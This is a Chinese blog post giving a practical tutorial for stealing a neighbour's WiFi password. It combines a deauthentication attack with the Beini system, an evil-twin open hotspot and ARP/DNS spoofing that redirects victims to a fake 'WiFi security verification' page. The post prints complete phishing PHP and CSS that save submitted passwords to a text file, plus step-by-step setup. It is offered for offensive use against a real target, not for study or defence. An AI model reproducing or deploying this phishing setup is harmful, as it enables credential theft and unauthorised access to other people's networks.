最新文章:
- Google Map api国内正常使用该如何配置(2021最新)
- wordpress国内网速慢加速及防DDOS攻击快速CF切换教程
- 2.18-3.31,共战疫情,阿里云免费送.网址域名
- Ubuntu安装时出现“failed to load ldlinux.c32”
- iconv函数报错 Detected an illegal character in input string
首页 信息安全
都有哪些蹭网的方法?
发布时间:2015年09月03日 评论数:抢沙发 阅读数:4634
-
前几天家里断网了,只好想办法蹭蹭隔壁的网,可是对方密码太强了,只好想了这招来钓取WIFI密码。
利用beini给对方的wifi(下面简称:awifi)断网,建立同名wifi(下面简称bwifi:),bwifi中使用arp dns欺骗使用户访问的网址自动跳转到我们事先布置好的页面(所谓的"wifi安全验证"),来钓取wifi密码。
示意图:
新建位图图像.jpg
1.首先我们要搭建好web服务器(我这里使用的是win7_32+apache)
2.下面附上我自己写的钓鱼php,为了适应手机界面我引入了‘bootstrap.min.css’这个在网上可以下到
index.php
<!DOCTYPE html>
<html>
<head>
<meta charset="gb2312">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>WIFI安全验证</title>
<link href="bootstrap.min.css" rel="stylesheet">
<link href="signin.css" rel="stylesheet">
</head>
<body>
<?php
$pass = @$_POST['password'];
if(strlen($pass)>7){
$path='pass.txt';
$f=fopen($path,'a');
fwrite($f,$pass."rn");
fclose($f);
}
?>
<div class="container">
<form class="form-signin" action="index.php" method="post">
<h3 class="form-signin-heading">请输入WIFI密码</h3>
<label for="inputPassword" class="sr-only">Password</label>
<input type="password" id="password" name="password" class="form-control" placeholder="WIFI 密码" required>
<div class="checkbox">
<label>
<input type="checkbox" value="remember-me"> 记住密码
</label>
<x style="color: #9d9d9d" onclick="alert('1.如果您忘记了WIFI密码n2.请按下路由器上的reset键n3.reset后WIFI密码为默认密码n4.默认密码在路由器的背面可以看到.')">忘记密码</x>
</div>
<button class="btn btn-lg btn-primary btn-block" type="submit" onclick="alert('t密码错误!tnt请重试t')">登陆 WIFI</button>
</form>
</div>
</body>
</html>
signin.css
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #eee;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
3.之后呢还需要新建一个pass.txt的文本文档用来接收钓到的密码
目录结构如下
微信截图_20150815110126.jpg
4.在电脑上新建一个同名不加密wifi热点
5.arp dns欺骗跳转(这里就不详细说了网上有很多)
6.打开另一个电脑(beini系统)给对方的wifi进行断网攻击
4a36acaf2edda3cc95f2029001e93901213f9268.jpg
下面就坐等收密码啦,密码获取到后会在pass.txt中
本文作者:Mr.linus
文章标题: 都有哪些蹭网的方法?
本文地址:http://www.90qj.com/221.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
本文地址:http://www.90qj.com/221.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
相关文章